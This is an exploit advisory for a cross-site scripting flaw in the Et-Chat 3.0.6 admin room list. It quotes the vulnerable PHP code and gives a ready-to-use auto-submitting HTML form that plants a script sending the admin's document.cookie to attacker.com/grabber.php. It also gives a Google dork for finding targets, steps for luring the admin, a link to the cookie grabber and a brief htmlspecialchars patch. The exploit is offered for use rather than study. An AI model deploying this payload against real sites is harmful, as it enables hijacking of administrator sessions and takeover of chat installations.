    # Exploit Title: Et-Chat 3.0.6 Cross Site Scripting Vulnerability # Google Dork: "ET-Chat v3.0.6" # Date: 2015-03-20 # Exploit Author: IranHack Security Team # Tested on: Windows 7 # Vendor : Www.Et-chat.Ir # Our Website : Www.IranHack.Org *************************************************** Vulnerable code : Location : /etchat/class/admin/AdminRoomsIndex.class.php Code : if (is_array($feld)){ $print_room_list = "<table>"; foreach($feld as $datasets){ if ($datasets[0]!=1) $print_room_list.= "<tr><td><b>".$datasets[1]."</b></td><td> </td><td><a href=\"./?AdminDeleteRoom&id=".$datasets[0]."&cs4rue=".$_SESSION['etchat_'.$this->_prefix.'CheckSum4RegUserEdit']."\">".$lang->delete[0]->tagData."</a></td><td><a href=\"./?AdminEditRoom&id=".$datasets[0]."\">".$lang->rename[0]->tagData."</a></td><td> <i>".$lang->room_priv[$datasets[2]]->tagData."</i></td></tr>"; else $print_room_list.= "<tr><td><b>".$datasets[1]."</b></td><td> </td><td style=\"color: #888888;\"><strike>".$lang->delete[0]->tagData."</strike></td><td><a href=\"./?AdminEditRoom&id=".$datasets[0]."\">".$lang->rename[0]->tagData."</a></td><td> <i>".$lang->room_priv[$datasets[2]]->tagData."</i></td></tr>"; } $print_room_list.= "</table>"; } *************************************************** Description : This vulnerability allows attacker to grab admin cookie and login with admin account The reason of this vulnerability is that values of the room list ( ".$datasets[1]." ) is not filtered and allows attacker to run javascript code. *************************************************** Exploit : 1- Upload this page in a host or Set this code in a html page : <html> <body> <form name="exploit" action="http://target.com/etchat/?AdminCreateNewRoom" method="POST"> <input type="hidden" name="room" value="<script>location.href="http://attacker.com/grabber.php?cookie="+escape(document.cookie)</script> " /> <script>document.exploit.submit(); </script> </form> </body> </html> 2- Give the uploaded html page address to admin. 3- after opening this page by admin , cookies are logged in Log.txt *************************************************** grabber.php : http://up.iranhack.org/uploads/lquswjwo06vrxz1fe4oo.zip *************************************************** Patch : If u wanna patch this bug , go to file " /etchat/class/admin/AdminRoomsIndex.class.php " Replace this codes : ".$datasets[1]." With this code : ".htmlspecialchars($datasets[1])." *************************************************** Greetz : Mr.XpR , V30Sharp , AL1R3Z4 , Secret.Walker , Irblackhat , FarbodEZRaeL , black-sec , Mr.X2 , @3is , IR4N0nY , , 0x8F , Amirio , 3cure , FTA_Boy , Mr.FixXxer ./Moji.Rider Source
×
×
  • Create New...